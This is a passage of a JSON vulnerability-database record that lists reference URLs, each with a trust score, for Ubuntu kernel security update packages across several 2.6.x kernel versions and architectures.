        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
